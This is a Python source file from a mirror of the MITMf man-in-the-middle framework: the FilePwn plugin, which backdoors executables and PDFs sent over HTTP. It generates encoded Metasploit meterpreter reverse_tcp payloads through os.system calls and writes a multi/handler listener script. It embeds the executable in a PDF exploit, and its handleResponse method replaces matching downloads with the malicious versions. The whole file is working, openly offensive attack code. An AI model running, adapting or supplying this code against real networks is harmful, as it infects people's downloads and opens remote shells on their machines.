github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-07 21:42:17 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions
MITMf/plugins/FilePwn.py
byt3bl33d3r 3572566228 added submodule bdfproxy
2014-07-12 07:51:06 +02:00

87 lines
3.8 KiB
Python
Raw Blame History

import os,subprocess,logging,time
from bdfproxy.bdf_proxy import *
exe_mimetypes = ['application/octet-stream', 'application/x-msdownload', 'application/exe', 'application/x-exe', 'application/dos-exe', 'vms/exe', 'application/x-winexe', 'application/msdos-windows', 'application/x-msdos-program']
class FilePwn(Plugin):
name = "FilePwn"
optname = "filepwn"
implements = ["handleResponse"]
has_opts = True
log_level = logging.DEBUG
desc = "Backdoor files being sent over http unsing bdproxy"
def initialize(self,options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.msf_file_payload_opts = "LHOST=%s LPORT=%s" % \
(options.msf_lhost,options.msf_file_lport)
self.payloads = {}
self._make_files()
if options.launch_msf_listener and options.msf_rc == "/tmp/tmp.rc":
self._start_msf()
def _start_msf(self):
f = open("/tmp/tmp.rc","a")
f.write('''
use multi/handler
set PAYLOAD %s
set LHOST %s
set LPORT %s
set ExistOnSession false
exploit -j
''' % (self.options.msf_file_payload,self.options.msf_lhost,
self.options.msf_file_lport))
f.close()
def _make_files(self):
self.exe_made = False
if self.options.exe:
self._make_exe()
if self.options.pdf:
self._make_pdf()
def _make_exe(self):
if self.options.exe_file == None:
logging.info("Generating our executable...")
msfp = os.path.join(self.options.msf_path,"msfpayload") + " %s %s"
msfe = os.path.join(self.options.msf_path,"msfencode") + " %s"
payload = msfp%(self.options.msf_file_payload,self.msf_file_payload_opts)
encode = msfe % "-t exe -o /tmp/tmp.exe -e x86/shikata_ga_nai -c 8"
#print payload+" R |"+encode
os.system(payload+" R |"+encode)
self.exe_made = True
self.exe = "/tmp/tmp.exe"
else:
self.exe = self.options.exe_file
self.exe_payload = open(self.exe,"rb").read()
if self.options.exe:
for m in exe_mimetypes:
self.payloads[m] = self.exe_payload
def _make_pdf(self):
logging.info("Generating our PDF...")
if self.options.pdf_exploit.find("embedded_exe") != -1:
if not self.exe_made:
self._make_exe()
if self.msf_file_payload_opts.find("EXEFILE") == -1:
self.msf_file_payload_opts += " EXEFILE=" + self.exe
if self.msf_file_payload_opts.find("INFILENAME") == -1:
self.msf_file_payload_opts += " INFILENAME=" + \
os.path.join(self.options.full_path,"data/blank.pdf")
self.msf_file_payload_opts += " FILENAME=/tmp/tmp.pdf"
msfc = os.path.join(self.options.msf_path,"msfcli") + " %s %s E"
os.system(msfc % (self.options.pdf_exploit,self.msf_file_payload_opts))
self.payloads['application/pdf'] = open("/tmp/tmp.pdf","rb").read()
def handleResponse(self,request,data):
#print "http://" + request.client.getRequestHostname() + request.uri
ch = request.client.headers['Content-Type']
#print ch
if ch in self.payloads:
print "Replaced file of mimtype %s with malicious version" % ch
data = self.payloads[ch]
return {'request':request,'data':data}
else:
return
def add_options(self,options):
options.add_argument("--msf-file-payload",type=str,default="windows/meterpreter/reverse_tcp",
help="Payload you want to use (default: windows/meterpreter/reverse_tcp)")
Reference in a new issue View git blame Copy permalink